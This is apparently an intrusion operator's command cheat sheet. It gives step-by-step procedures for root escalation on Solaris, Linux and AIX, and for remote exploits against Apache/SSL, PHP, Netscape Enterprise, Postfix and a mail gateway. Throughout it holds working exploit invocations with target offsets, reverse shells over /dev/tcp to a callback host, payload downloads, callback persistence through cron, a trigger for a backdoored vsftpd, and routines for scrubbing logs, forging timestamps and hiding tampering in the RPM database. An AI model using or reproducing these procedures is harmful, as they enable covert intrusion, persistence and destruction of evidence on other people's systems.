52213 mkdir /tmp/.scsi; cd /tmp/.scsi; telnet local_ip port ] [-u ] [-g ] [-n] ./eb id ### start a new nopen as root: PATH=. D="-l RANDOM" sendmail -nstun TARGET_IP RANDOM -rm eb mod32 ######################################################### # WALNUTSMOOTHY ######################################################### # elevate to root: Sol 2.5.1-2.8 mkdir /tmp/1291aaab/ -put /current/up/efs f cp f /tmp/1291aaab -shell cd /tmp/1291aaab pwd ./f unset HISTSIZE unset HISTFILESIZE unset HISTFILE id cd /tmp/.scsi head /etc/passwd ### start a new nopen as root while in -shell: PATH=. D="-l RANDOM" sendmail exit ### connect to privileged nopen: -nstun TARGET_IP RANDOM ### burn unprivileged nopen ### cleanup files -rm /tmp/1291aaab/f f sendmail -rm /tmp/1291aaab -lt /tmp ######################################################### # EXTREMEPARR ######################################################### # elevate to root: Sol 2.6-2.9 ### ### make sure this exists: -ls /usr/dt/bin/dtappgather ### Upload the proper version -cd /tmp/.scsi -put /current/up/exp.x.tar.Z b.tar.Z uncompress b.tar.Z tar -xf b.tar ### Find a setuid root program to use for the exploit ### The following should work: ### w, ps -ef, at -l, whodo, who, and ls -al ### Pick a program, determine the location, and verify setuid root is there ### (should see perms of -rwsr-xr-x) which at -ls /bin/at ### Verify su is NOT in the locale directory already ls -al /usr/lib/locale/su ### Rename the shared object to have the name of 'su' or whichever loacale you use instead ### Be sure you use the correct version for the system's architecture cp su.so.2.789x su.so.2 -ls -t ### Have a copy of nopen in your working directory to start up once you get root: -put /current/up/noserver sendmail -ls ### Insert the local shared object /usr/lib/locale by running the following ### This will also generate itime commands to use later when cleaning up, ### normal error messages, and an indication of the success/failure of th ### insertion of the object into /usr/lib/locale ./exp su echo "" | at now + 180 mins ### Set up your variables -getenv -setenv LC_TIME=su -getenv at -l -shell LC_TIME=su export LC_TIME at -l id pwd cd /tmp/.scsi PATH=. sendmail exit exit ### Connect from pitch to new noserver that has root privileges -nstun TARGET_IP ### Burn your unprivileged nopen session and connect agin to new noserver -burn -nstun TARGET_IP ### Cleanup at -l at -r 1085530072.a at -l ls -al /.sh_history -ls -t / ls -lart /usr/lib/locale rm /usr/lib/locale/su/* rmdir /usr/lib/locale/su -lt /usr/lib/locale ls -al /usr/lib | grep locale ls -al /var/dt/appconfig | grep appmanager ls -al /var/dt | grep appconfig chmod 755 /usr/lib/locale chmod 755 /var/dt/appconfig/appmanager chmod 755 /var/dt/appconfig chown bin:bin /usr/lib/locale chown root:root /var/dt/appconfig/appmanager /var/dt/appconfig ls -al /usr/lib | grep locale ls -al /var/dt/appconfig | grep appmanager ls -al /var/dt | grep appconfig -touch /usr/lib/localedef /usr/lib/locale -w -ls -t id -w -ls -ls -t /usr/lib/locale -ls -t /usr/lib/locale/iso_8859_1 -ls -t /usr/lib/locale/iso_8859_1/LC_CTYPE -touch /usr/lib/locale/iso_8859_1 /usr/lib/locale/. touch -r /usr/lib/locale/iso_8859_1 /usr/lib/locale/. -ls -t /usr/lib/locale ls -al /var/dt/appconfig | grep appmanager ls -al /var/dt | grep appconfig -ls -t /var/dt/ -ls -t /var/dt/appconfig touch -r /var/dt/. /var/dt/appconfig/appmanager touch -r /var/dt/. /var/dt/appconfig/. -ls -t /var/dt/appconfig -ls -t /var/dt/ ### Clean up directory -ls -t -rm sendmail empty su.so.2 b.tar exp su.so.2.789x su.so.2.6x -ls -t ### Check crontabs and logs if you used 'at' -ls -t /var/adm -ls -t /var/spool/cron -ls -t /var/spool/cron/atjobs touch -r /var/spool/cron/crontabs /var/spool/cron/atjobs -tail -40 /var/cron/log ### Toast and sgrep your initial exploit ####################################### ### EVENTSTART ####################################### ### might reboot box on first try; after the reboot, it should work ### if you exploited an http service (like w/ EMBERSNOUT) make sure that ### service is started upon reboot; RH9.0 doesn't restart http by default ### unless the admin changed the config ### verify http is restarted at reboot: -ls -t /etc/init.d -ls -t /etc/rc.d/rc3.d -ls /etc/rc.d/rc*.d/*htt* chkconfig --list |grep htt runlevel ### start a cron job to call nopen in case of a reboot (if you won't be able to reexploit) ### set the time to remove itself to the next hour (use both local and UTC time) vi /current/down/crontab: 0,5,10,15,20,25,30,35,40,45,50,55 * * * * sh -c "D=-cPITCH_IP:PORT /tmp/.httpd-lock/crond" 0 1,17 * * * crontab -r ### on target: date; date -u -ls -t /var/log/cron -ls -t /var/spool/cron -cat /etc/syslog.conf crontab -l -put /current/down/crontab crontab -cat crontab crontab crontab crontab -l date ### upload eventstart: -put /current/up/h h -shell unset HISTFILE unset HISTFILESIZE unset HISTSIZE id pwd ls -l PATH=. sendmail exit exit ### remove crontab after you elevate (or reboot - haha!) crontab -r ####################################### # PTRACE/FORKPTY ####################################### ### new exploit is ptrace-kmod; it's a kernel exploit, no suid needed. ### works on linux 2.2 -> 2.4, ex) RH8.0 and MDK 9.0 ### might have to run it twice before it works. ### other ptraces are older and need to run against a setuid program that won't log ### like /usr/sbin/usernetctl, /usr/sbin/userhelper, or /usr/sbin/traceroute # find / -fstype nfs -prune -o -type f \( -perm -4000 \) -user root -ls > o # get o #### get ptrace, forkpty, and nopen tarball ready to send: cd /current/up cp ptrace pt cp noserver sendmail cp forkpty fp tar cvf 1u.tar pt sendmail fp uuencode 1u.tar 1u.tar > 1u.tar.uu nc -l -p NETCAT_PORT < 1u.tar.uu #### to elevate and also get nopen there: cd /tmp mkdir .scsi cd .scsi telnet LOCAL_IP NETCAT_PORT > src Connection closed by foreign host. ls -la uudecode src ls -la tar xvf 1u.tar ls -la chmod 700 fp sendmail pt ./fp #### at sh-prompt, type: tty ./pt unset HISTFILE unset HISTSIZE unset HISTFILESIZE id PATH=. sendmail ######################################## # TFTPD - upload image to router ######################################## ### get on redirector with nopen mkdir /tmp/.scsi chmod 777 /tmp/.scsi -cd /tmp/.scsi -put ../up/tftpd_clean sched ### name the image EXACTLY how it will appear on the target - get tech guidance -put image image.name chmod 777 image.name ### start tftpd listener #Example ./sched -l -a 10.0.0.14 -s /tmp/.scsi # the -a IP option is the PITCH IP that talks to the router (if multiple interfaces) -shell ./sched -l -a PITCH_IP -s /tmp/.scsi DONE exit -rm image.name sched -cd /tmp -rm /tmp/.scsi -lt ######################################## # SAMPLEMAN / ROUTER TOUCH ######################################## ### redir -tunnel l 2323 TARGET_IP 23 ### Locally: telnet 127.0.0.1 2323 # userid = <> # passwd = <> term length 0 sh user sh ver sh arp sh ip rout sh proc cpu enable # enable password = <> sh run sh start sh cdp neighbo detail sh flash all # use the chart to figure out mem location for the next command if applicable sh mem
logout ######################################## # ENGAGENAUGHTY ######################################## # Apache and SSL exploit on Linux on Dec ALpha # ssl must be OpenSSL 0.9.6d or earlier Usage: ./apache-ssl-linux-alpha <-i hostname> [-t arch] [-p port] [-n ] [-a 0x
] -t target architecture (default is 00) -p SSL port (default is 443) -a 0x
the free location found via objdump -n open N apache connections before sending the shellcode (default is 20) -m maximum number of open connections (default is 50) -v verbose mode -c command to run (default is "ls > /tmp/ls".)Supported architectures: target archs: 00 - RedHat Linux 7.0 Apache/1.3.12 (Unix) (Red Hat/Linux) mod_ssl/2.6.6 OpenSSL/0.9.5a Examples: ./apache-ssl-linux-alpha -a 10 -v localhost ./apache-ssl-linux-alpha -p 1234 192.168.0.1 -n 40 -m 80 examples of commands: 1. xterm: /usr/X11R6/bin/xterm -display 555.1.2.153:0 -e /bin/sh 2. wget: First: echo -e "HTTP/1.0 200\n" > new; cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail; nc -v -l -p 53 < sendmail then: cd /tmp;wget http://555.1.2.153:53/sendmail; chmod +x /tmp/sendmail;PATH=/tmp sendmail;rm -f sendmail 3. xinetd (watch for logging): echo -e "service squid\n{\nsocket_type = stream\nwait = no\nuser = apache\nserver = /bin/sh\n}" > /tmp/.scsi; /usr/sbin/xinetd -f /tmp/.scsi scan ssl TARGET_IP ### scripted window nc -l -vv -p RANDOWM -tunnel l 11443 TARGET_IP 443 r RANDOM ./apache-ssl-linux-alpha -i PITCH_IP -p SSL_PORT -v -c "(sh&0 2>&0)" # or for ksh: ./apache-ssl-linux-alpha -i PITCH_IP -p SSL_PORT -v -c "(ksh -c "sh &0 2>&0")" xhost + -tunnel r 6006 127.0.0.1 6000 ### This one pops back an xterm (be patient for it to pop back and keep mouse clear of window): ./apache-ssl-linux-alpha -i PITCH_IP -p SSL_PORT -v -c "/usr/bin/X11/xterm -display PITCH_IP:6 -e /bin/sh" ### Cleaning: /var/log/httpd/error_log ############################################################################ # EXPLOITRETURN # redflag 2.0 and redhat 9.0 running PHP # found in cgi-bin for sybil build -scan http TARGET_IP HTTP/1.1 200 OK Date: Wed, 25 Feb 2004 22:02:11 GMT Server: Apache/1.3.12 (Unix) (Black Cat/Linux) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP/4.0.0 rus/PL29.4 -tunnel l 80 TARGET_IP # choose 79, 5555 r 79 or r 5555 telnet 127.0.0.1 80 GET /HTTP/1.0 telnet 127.0.0.1 80 GET /ppd/product_user/reg_edu.php HTTP/1.0 # hit return twice #response looking for: HTTP/1.1 302 Found # do not use option 1 or 4 since it brings inconsistent results xp_server # uuencoded rat uuencode sendmail sendmail > sendmail.uu nc -l -v -p 79 < sendmail.uu ./xp_serial -i127.0.0.1 -p80 -d"/ppd/product_user/reg_edu.php" -l PITCH_IP -n79 -t3 or # no uuencode of rat nc -l -v -p 5555 < sendmail ./xp_serial -i127.0.0.1 -p80 -d"/ppd/product_user/reg_edu.php" -l PITCH_IP -n5555 -t2 # after rat upload, nc command -nstun TARGET_IP # will be nobody - need to elevate with ptrace or other # need to clean the following logs /var/log/httpd/error_log /var/log/httpd/access_log ##################################################### # EGGBASKET ##################################################### # Remote exploit against the Netscape Web Server which leverages # a buffer overflow to obtain remote access # Netscape Enterprise/3.6 and Netscape Enterprise/3.6 SP1 # works against AIMC Netscape servers also with right versions # Netscape-Enterprise 3.6: # solaris 2.6(sun4m only), sun4u & sun4m solaris 2.7 - 2.9 # Netscape-Enterprise/3.6 SP1: # sun4m solaris 2.8, sun4m & sun4u solaris 2.9 # need local to elevate such as SMOOTHY and EXTREMEPARR # Verify version of Netscape if target did not change version string -scan http TARGET_IP # from redirector -tunnel l 80 TARGET_IP # locally nc 127.0.0.1 80 GET / HTTP/1.0 # on redirector -tunnel l 80 TARGET_IP r RANDOM_HIGH_PORT1 # locally window1 nc -vv -l -p RANDOM_HIGH_PORT1 # Usage: xp_ns-httpd # i7 - program counter, location we are jumping to; fp - stack location; 04 - where our code is Targets: i7 fp o4 Version: 01: Netscape-Enterprise/3.6/sun4u/5.8/fire115/aimc 0xff2a2a74 0xff2e6270 0x13ab60 Version: 02: Netscape-Enterprise/3.6/sun4m/5.8/theora/aimc 0xef722a74 0xef766270 0x13a360 Version: 03: Netscape-Enterprise/3.6/sun4m/5.8/unixtest-4/aimc 0xef6e2a74 0xef726270 0x13a060 Version: 04: Netscape-Enterprise/3.6/sun4u/5.8/unixtest-1/aimc 0xff2a2a74 0xff2e6270 0x13a160 Version: 05: Netscape-Enterprise/3.6/sun4u/5.8/fire121/aimc 0xff2a2a74 0xff2e6270 0x13ab60 Version: 06: Netscape-Enterprise/3.6/sun4m/5.8/arc/aimc 0xef6e2a74 0xef726270 0x139d60 Version: 07: Netscape-Enterprise/3.6/sun4u/5.7/baltimore/aimc 0xff2a2a74 0xff2e6270 0x13a360 Version: 08: Netscape-Enterprise/3.6/sun4u/5.7/grandmama/aimc 0xff2a2a74 0xff2e6270 0x13a260 Version: 09: Netscape-Enterprise/3.6/sun4m/5.7/unixtest-3/aimc 0xef722a74 0xef766270 0x139360 Version: 10: Netscape-Enterprise/3.6/sun4m/5.6/elsa/aimc 0xef722a74 0xef766270 0x13a060 Version: 11: Netscape-Enterprise/3.6/sun4m/5.6/gazoo/aimc 0xef722a74 0xef766270 0x13a060 Version: 12: Netscape-Enterprise/3.6/sun4m/5.6/loneranger/aimc 0xef722a74 0xef766270 0x139360 Version: 13: Netscape-Enterprise/3.6/sun4u/5.9/fire108/aimc 0xff2a2a74 0xff2e6270 0x139f60 Version: 14: Netscape-Enterprise/3.6/sun4m/5.9/mack/aimc 0xef6e2a74 0xef726270 0x139d60 Version: 15: Netscape-Enterprise/3.6/sun4u/5.9/thing/aimc 0xff2a2a74 0xff2e6270 0x139f60 Version: 16: Netscape-Enterprise/3.6/sun4u/5.9/thing 0xff2a2a74 0xff2e6270 0x155090 Version: 17: Netscape-Enterprise/3.6/sun4u/5.9/fire117 0xff2a2a74 0xff2e6270 0x155090 Version: 18: Netscape-Enterprise/3.6/sun4m/5.6/loneranger 0xef722a74 0xef766270 0x153f78 Version: 19: Netscape-Enterprise/3.6/sun4u/5.9/thing 0xff2a2a74 0xff2e6270 0x155290 Version: 19: Netscape-Enterprise/3.6/sun4u/5.8/blade1000 0xff2a2a74 0xff2e6270 0x155f90 Version: 20: Netscape-Enterprise/3.6sp1/sun4u/5.9/thing 0xff2a2c64 0xff2e6750 0x155390 Version: 21: Netscape-Enterprise/3.6sp1/sun4m/5.8/theora 0xef722c64 0xef766750 0x155390 Version: 22: Netscape-Enterprise/3.6sp1/sun4m/5.9/mack 0xef6e2c64 0xef726750 0x155090 # -f webpath: usually just / # -c command: "(ksh -c \"sh &0 2>&0\")&" # -7 i7: have seen 0xff2a2a74, 0xef722a74, 0xef6e2a74 # -6 sp: these work 0xff2e6270, 0xef766270, 0xef726270 # -4 o4: , have seen 0x153090, when running AIMC, use 0x139360 # -d destination target # -p port: # -s sleep number of seconds between requests # -h usage # -x range in the heap. # -i heap increment. another good one to try is 0x80 # locally window2 # Example 1 assumes default install: Example 1: xp_ns-httpd -f / -c "(ksh -c \"sh &0 2>&0\")&" -d 127.0.0.1 -p 80 # Example 2, Netscape was installed with AIMC: Example 2, AIMC box: xp_ns-httpd -f / -c "(ksh -c \"sh &0 2>&0\")&" -d 127.0.0.1 -p 80 -4 0 x139360 -s 10 -x 64 Example 3, low level mode: xp_ns-httpd -f / -c "(ksh -c \"sh &0 2>&0\")&" -7 0xff2a2a74 -6 0xff2e6270 -d 127.0.0.1 -p 80 -4 0x13a960 -s 10 -x 16 # Example 4, Netscape 3.6 SP1: Example 4, SP1: xp_ns-httpd -f / -c "(ksh -c \"sh &0 2>&0\")&" -7 0xff2a2c64 -6 0xff2e6750 -d 127.0.0.1 -p 80 # Example 5, a busy Netscape 3.6 SP1: Example 5: retry, but faster and more complete: xp_ns-httpd -f / -c "(ksh -c \"sh &0 2>&0\")&" -d 127.0.0.1 -s 5 -i 0x80 # Give troubleshooting instructions: # There are five steps in troubleshooting EGGBASKET v2: # Determine if the webserver is running Netscape-Enterprise 3.6 or 3.6 SP1. # nc 127.0.0.1 80 GET / HTTP/1.0 # Determine the OS based upon touch information or MAC address. # Maybe the server is busy serving requests, therefore try the # following additional options: -s 5 -i 0x80 # Maybe try a wider range in hitting the NOP sled, then try the # following additional options: -x 64 -4 0x139360 # AIMC or -x 64 -4 0x153090 # Normal install # Is the target running the AIMC version, then try the following additional option: -4 0x139360 # The line "Errorlog" in $SERVERROOTDIR/config/magnus.conf tells where logging # occurs # If the exploit fails, it is logged as such: # [18/Mar/2002:08:59:38] info (23834): successful server startup # [18/Mar/2002:08:59:38] info (23834): Netscape-Enterprise/3.6 SP1 B99.036.2117 # [18/Mar/2002:08:59:38] verbose (23834): livewireInit reports: Starting Server-Side JavaScript build: 99.036.2332 ###################### EXCEEDSALON-AIX ##################### ## local elevation for AIX ## does not log but check anyway # elevation as user mkdir /tmp/.pci cd /tmp/.pci # use ftshell, uudecode copy/paste, telnet/nc, or wget to put # /current/up/xp_lquerypv-aix5.1 up as s ./s # elevation in nopen mkdir /tmp/.pci -cd /tmp/.pci -put /current/up/xp_lquerypv-aix5.1 s -shell id (user) ./s id (euid=root) ./sendmail /tmp/exit ###################### ESTOPFORBADE ##################### # local root elevation against gds_inet_server under # Cobalt Linux release 6.0 # for complexpuzzle # on target from nopen -lt /usr/local/sbin/gds_inet_server mkdir /tmp/.pci -cd /tmp/.pci pwd -put /current/up/xp_gds_inet_server g -shell id ./g unset HISTSIZE unset HISTFILESIZE unset HISTFILE id # try up to 2 times for elevation ##################################################### # ENTERSEED ##################################################### # # Apparently, 30 or so minutes and you can bail...no joy. # ## Set up redirector -tunnel l 2500 TARGET_IP 25 r NETCAT_PORT 127.0.0.1 NETCAT_PORT ## set up a netcat listener in a local scripted window ## to upload a STATICALLY COMPILED NOPEN nc -l -v -p NETCAT_PORT < noserver-static ## LOCALLY in another window: OPTIONAL: Alert to show we hit while [ 1 ] ; do netstat -an | grep NETCAT_PORT.*LISTEN || break ; sleep 2 ; done ; beeps 3333 ## run exploit in a local scripted window #Usage: ./enterseed.py [-search] [-u] [-fuploaded-filename] #Platforms 1: SuSE 9.0 RPM (postfix-2.0.14-41) # 2: SuSE 9.1 RPM (postfix-2.0.19_20040312-11) # 3: ASP Linux 9 RPM (postfix-2.0.8-1asp) # NOTE: THERE ARE OTHERS BEYOND 3....6 is Debian 3.1 for instance.... ./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 1 ./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 1 -uroot@TARGET_IP ./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 2 ./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 2 -uroot@TARGET_IP ./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 3 -uroot@TARGET_IP -search1 ## once the exploit calls back and nopen uploaded connect to noserver -nstun TARGET_IP ## check to see if you are chroot'd -lt / ## if it looks like #drwx------ 2 postfix root 4096 Apr 27 04:35 2003 corrupt #drwx-wx--- 2 postfix postdrop 4096 Apr 27 04:35 2003 maildrop #drwx------ 2 postfix root 4096 Apr 27 04:35 2003 saved #drwxr-xr-x 3 root root 4096 Nov 17 07:22 2004 usr #drwxr-xr-x 18 root root 4096 Nov 17 07:22 2004 . #drwxr-xr-x 2 root root 4096 Nov 17 07:22 2004 lib #drwx------ 2 postfix root 4096 Nov 17 07:22 2004 hold #drwxr-xr-x 26 root root 4096 Nov 17 07:36 2004 .. #drwxr-xr-x 2 root root 4096 Nov 18 12:54 2004 etc #drwx------ 18 postfix root 4096 Nov 18 14:50 2004 active #drwx------ 18 postfix root 4096 Nov 18 14:50 2004 bounce #drwx------ 18 postfix root 4096 Dec 1 12:37 2004 deferred #drwx------ 3 postfix root 4096 Dec 1 14:53 2004 flush #drwxr-xr-x 2 root root 4096 Dec 1 14:53 2004 pid #drwx------ 15 postfix root 4096 Dec 8 14:00 2004 defer #drwx------ 2 postfix root 4096 Mar 4 15:34 2005 private #drwx--x--- 2 postfix postdrop 4096 Mar 4 15:34 2005 public #drwxrwxrwx 19 postfix root 4096 Mar 7 11:36 2005 incoming ## this means you are in a chrooted environment without any binaries ## (no ls, netstat, ps, which, w, ...) ## IF NOT CHROOTED, continue to clean logs ## IF CHROOTED -cd incoming -put /current/up/h h -put /current/up/b b -put /current/up/s s -put /current/up/noserver ncd ## change permissions ./s h ./s b ./s ncd ./s . ## run break chroot routines ./h ## you should be able to connect to a new nopen running -nstun TARGET_IP 32755 ## CLEANUP ## the location of the chrooted environment was /var/spool/postfix/ -lt /var/spool/postfix/ -lt /var/spool/postfix/incoming -rm b h s ncd a.. ## CLEAN LOGS ## check logs /var/log/mail* /var/adm/mail* /var/log/messages /var/adm/messages grep "stripping too many comments" /var/adm/mail* grep "stripping too many comments" /var/log/mail* grep "signal 11" /var/log/mail* grep "signal 11" /var/adm/mail* grep "bogus file" /var/adm/mail* grep "bogus file" /var/log/mail* grep "writable by everyone" /var/adm/mail* grep "writable by everyone" /var/log/mail* grep PITCH_IP /var/log/messages grep PITCH_IP /var/adm/messages ## if any of the directories or files were changed to world writable ## change them back because postfix will panic chmod PREV_PERM /var/spool/postfix/incoming ######################################## # Exploits a vulnerability in the Postfix mail server. # Postfix runs on FreeBSD, Linux, Solaris, and most Unix servers. # This exploit works for the default binary packages in SuSE 9.0-9.2, ASP Linux 9, and Debian 3.1 # must elevate to get root # postfix 2.0.14-41 on SuSE 9.0 # postfix 2.0.19_20040312-11 on SuSE 9.1 # postfix-2.0.8-1asp on ASP Linux 9 # postfix-2.1.5 on SuSE 9.2 # postfix-2.1.5 on Debian 3.1 # # ENTERSEED expects the DUL Encoder to be in its current directory, as well # as write permission to that directory. # # In the event of a chroot'ed environment, shared libraries will not be usuable. # Any uploaded files (such as noserver) must be statically compiled. # # -tunnel # r NETCAT_PORT # l RANDOM TARGET_IP TARGET_PORT ./enterseed.py 127.0.0.1 RANDOM PITCH_IP NETCAT_PORT [-search] [-u] [-f] # Usage: ./enterseed.py [-search] [-u] [-f] # Platforms 1: SuSE 9.0 RPM (postfix-2.0.14-41) from short hostname (0-19 chars) # 2: SuSE 9.0 RPM (postfix-2.0.14-41) from long hostname (17-43 chars) # 3: SuSE 9.1 RPM (postfix-2.0.19_20040312-11) from long hostname (17-43 chars) # 4: ASP Linux 9 RPM (postfix-2.0.8-1asp) from long hostname (17-43 chars) # 5: SuSE 9.2 RPM (postfix-2.1.5) # 6: Debian 3.1 (sarge) DEB (postfix-2.1.5) # # # Chroot Example: # # Begin like above. Once connected with noclient, -cd to incoming and upload the statically compiled # EVENTSTART, the breakchroot program, and the setperms program (for this example, these # binaries are named h, b, and s, respectively. Since EVENTSTART is unable to take command-line # arguments or environment variables, h expects breakchroot to be named "b" and breakchroot # expects noserver to be named "ncd." The names are all configurable, but require a recompile. # Be sure to compile statically!) # # After uploading, use s to set the permissions on b, ncd and the current directory: # (remote)$ ./s b # (remote)$ ./s ncd # (remote)$ ./s . # These files should all be set to mode 777 now. # # Now run EVENTSTART: # (remote)$ ./h # EVENTSTART will execute b (the breakchroot program) with root privileges, which will in turn break # out of the chroot and exec ncd (noserver) from the root directory and with root privileges. # The breakchroot program creates a directory "a.." while breaking chroot. Remember to delete # this directory as well! # Now connect to the new noserver: # (local)$ ./noclient 555.1.11.25:32755 # (remote)# id # uid=0(root) gid=0(root) groups=0(root) # (remote)# pwd # / # # Make sure to delete all uploaded files/directories and reset directory permissions! # # Troubleshooting: # If EVENTSTART fails and says something like "No such file or directory" make sure all binaries # have been statically compiled. # If EVENTSTART fails and says something like "Permission denied" make sure all binaries are set # to mode 777. If not, use the setperms program (s). ##################################################### # EMPTYBOWL ##################################################### # vulnerability in MailCenter Gateway (mcgate) - an application that comes # with Asia Info Message Center mailserver; buffer overflow allows a string # passed to popen() call to be controlled by an attacker; arbitraty cmd execute # known to work only for AIMC Version 2.9.5.1 # may get one shot only and then server will crash # works on solaris 2.6-2.10 # test - fire115 # make sure not windows target running 3389 but unix target -scan mail TARGET_IP -scan 3389 TARGET_IP # Usage: ./emptybowl.py # --NOTE: All spaces in cmd-string will be replaced by \t's # on redirector -tunnel l 3389 TARGET_ip r LOW_PORT_1 r LOW_PORT_2 # local may be needed to elevate privileges # DO NOT use the command below, since only have 1 shot at target #./emptybowl.py 127.0.0.1 3389 'mkdir /tmp/.scsi ; cd /tmp/.scsi && telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode && uncompress sendmail.Z && chmod 700 sendmail && PATH=. D="-cPITCH_IP:NOPEN_PORT" sendmail;' (sh&0 2>&0) ##### use this one nc -l -vv -p 33333 ./emptybowl.py 555.1.9.115 3389 "/usr/bin/ksh -c \"sh&0 2>&0\"" ##### or this with doublet: ./emptybowl.py 555.1.9.115 3389 "/usr/bin/ksh -c \"cat < /dev/tcp/555.1.14.111/33333 | /bin/sh 2>&1 | cat > /dev/tcp/555.1.14.111/44444 2>& 1\"" # on redirector netstat -an | grep LISTEN # look for low ports to use for doublet that are not # being used on the redirector (21,22,22,53,79,80,443...) # substitute LOW_PORT_1, LOW_PORT_2 with ports decided # from the above netstat command doublet -O LOW_PORT_1 LOW_PORT_2 # change LOW_PORT_1, LOW_PORT_2, and PITCH_IP ./emptybowl.py 127.0.0.1 3389 "/bin/ksh -c \"cat < /dev/tcp/PITCH_IP/LOW_PORT_1 | /bin/sh 2>&1 | cat > /dev/tcp/PITCH_IP/LOW_PORT_2 2>& 1\"" #./emptybowl.py 127.0.0.1 3389 '(telnet PITCH_IP LOW_PORT_1 ; sleep 1) | /bin/sh | telnet PITCH_IP LOW_PORT_2' # in doublet window unset HISTSIZE unset HISTFILESIZE unset HISTFILE w pwd id cd /tmp mkdir .scsi cd .scsi # locally packrat RAND_PORT # packrat command gedit sendmail.Z.uu # in doublet pwd # make sure in /tmp/.scsi /usr/bin/uudecode; ls -latr copy/paste gedit contents into this window uncompress sendmail.Z ls -l chmod 700 sendmail PATH=. sendmail # from redirector -nstun TARGET_IP # restart mcgate doublet window on TARGET_IP # close tunnels on PITCH_IP # start a new NOPEN with 'at' to avoid inheritance of listening socket -cd /tmp/.scsi echo "./sendmail" | at now # from PITCH_IP -nstun TARGET_IP:32755 #burn this NOPEN to free up socket; from original NOPEN # started (32754) on TARGET_IP -burnBURN # NOPEN 2: # now restart mcgate in new NOPEN - use at again to prevent mcgate # from being terminated on exit. -cd /opt/aimc/setup echo "./mcgate" | at now -cd /tmp/.scsi ps -ef | grep mcgate # ELEVATE with extremeparr (dtappgather) # after ELEVATE with extremeparr (dtappgather) # and restarting noserver (sendmail), connect with -nstun TARGET_IP:32754 -rm sendmail # burn nopen window on TARGET_IP with id of aimc id -burnBURN # # cleanup -lt /opt/aimc/setup/ # remove core file -rm /opt/aimc/setup/core # in mcgate's directory; the following will be appended to mcgate.: Fri Feb 11 16:36:49 2005: cmdopen --- : 0 : current cmd: uapi -u -f userPassword -e ******************************************** Fri Feb 11 16:36:49 2005: cmdopen --- : 0 : Result: rc= -5 len=0 -get /opt/aimc/setup/mcgate.YYYYMMDD #locally cp /current/down/../HOSTNAME.IP/opt/aimc/setup/mcgate.YYYYMMDD /current/up/m # remove above entries; please leave the mcgate # start values even the one we started. For example, leave: Fri Apr 8 16:12:28 2005: main --- : 0 : Current server port is 3389 vi /current/up/m # on target -put /current/up/m m -ls -n /opt/aimc/setup/mcgate.YYYYMMDD cat m > /opt/aimc/setup/mcgate.YYYYMMDD -tail /opt/aimc/setup/mcgate.YYYYMMDD # use -touch -t command from -ls -n output to # reset timestamp on /opt/aimc/setup/mcgate.YYYYMMDD and # /opt/aimc/setup. For example: -touch -t 1112992709:1112992787 /opt/aimc/setup/mcgate.YYYYMMDD -touch -t 1112992709:1112992787 /opt/aimc/setup -rm m at -l -lt /var/spool/cron /var/spool/cron/atjobs -touch /var/spool/cron/crontabs /var/spool/cron/atjobs -cd .. -rm .scsi ###### PORKED VSFTP Server ################################# # check to see if can use DIZZYTACHOMETER to remove mismatched vsftpd rpm --version whereis vsftpd rpm -qf /usr/sbin/vsftpd rpm -V vsftpd-1.1.3-8 -lt /usr/lib/librpm-4.1.so /usr/lib/librpmdb-4.1.so /usr/lib/librpmio-4.1.so /usr/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz 2.so # or -lt /usr/lib/librpm-4.2.so /usr/lib/librpmdb-4.2.so /usr/lib/librpmio-4.2.so /usr/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz 2.so -lt /usr/sbin/vsftpd # normal vsftpd md5sum: 11111ecd2d3ab44015eae3592fcfaec7 # porked vsftpd md5sum: bde8b06829df05be8be4b5972a2d4a39 md5sum vsftpd -put /current/up/it it ./it /usr/sbin/vsftpd cp /usr/sbin/vsftpd ? -put /current/up/vsftpd vsftpd cp vsftpd /usr/sbin/vsftpd # use itime results to reset vsftpd times to original settings ./it /usr/sbin/vsftpd service vsftpd stop service vsftpd start ######## Trigger porked vsftpd ### in local window, get nopen ready packrat -z NETCAT_PORT ### on redirector, get nopen listener ready -nrtun NOPEN_PORT ### on redirector, set up tunnel, use a "pork source port" from list below -tunnel l 21 TARGET_IP 21 SPORT r NETCAT_PORT ### in scripted local window, send pork trigger #Usage: ./client -t|-u timeadj sport hostname dport command #sport: 3 51 3854 5671 8213 12634 16798 23247 35139 47923 53246 63201 #./client -t|-u [tcp/udp] timeadj sport [(valid source ports for the server are: 3, 51, 3854, 5671, 8213, 12634, 16798, 23247, 35139, 47923, 53246, 63201)] hostname[Host IP] dport [(port on which PORKified daemon is listening)] command" ./client -t 0 SPORT 127.0.0.1 21 "cd /tmp;mkdir -p .scsi && cd .scsi; cat < /dev/tcp/PITCH_IP/NETCAT_PORT > sendmail.uu && uudecode sendmail.uu && chmod 755 sendmail && PATH=. S=1 D=\"-cPITCH_IP:NOPEN_PORT\" ./sendmail" # use DIZZYTACHOMETER to hide package mismatches ############## DIZZYTACHOMETER ################# # Most Linux distributions contain a RPM database which stores information on installed files. Thus, if a system file is # modified, the rpm "Verify" command easily alert the sysadmin of the changed file. DIZZYTACHOMETER alters a computer's # RPM (4.1 or higher) database in order to hide a modified file. This is essential when dropping down implants such # as Jackladder and Pork. # Works on Redhat 8 (rpm version 4.1), Redhat 9 (rpm version 4.2), and Mandrake 9.2 (verison 4.2) rpm --version ./DizzyTach -p "packageName" [-f "filepath\file"] [-d] [-r] [-c] [-s] [-m] [-t] [-q] [-V] or ARGS="-p "packageName" [-f "filepath\file"] [-d] [-r] [-c] [-s] [-m] [-t] [-q] [-V] [-R]" ./DizzyTach # library dependencies in /usr/lib: # # librpm-4.1.so # librpmdb-4.1.so # librpmio-4.1.so # libpopt.so # libbeecrypt.so # libbz2.so -lt /usr/lib/librpm-4.1.so /usr/lib/librpmdb-4.1.so /usr/lib/librpmio-4.1.so /usr/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz 2.so # or -lt /usr/lib/librpm-4.2.so /usr/lib/librpmdb-4.2.so /usr/lib/librpmio-4.2.so /usr/lib/libpopt.so /usr/lib/libbeecrypt.so 